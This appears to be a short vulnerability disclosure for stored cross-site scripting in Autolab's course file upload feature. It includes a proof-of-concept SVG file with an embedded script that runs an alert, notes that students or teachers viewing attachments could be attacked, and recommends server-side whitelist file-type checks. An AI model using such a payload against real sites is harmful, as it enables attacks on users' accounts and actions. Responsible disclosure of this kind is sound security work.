Autolab is vulnerable to stored cross-site-scripting in the upload files functionality in courses feature, this can be used to execute XSS attack against the victim who is a student/teacher.
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("xssed");
</script>
This can be used to perform XSS attacks on other users as other users such as students/teachers can also view attachments, xss can be weaponized to trick them to do unwanted actions by executing malicious javascript at their end.
Check file types while uploading, and allow only corresponding types, It is recommended to have a whitelist based approach to check the file type in server-side and to reject/accept the file while uploading.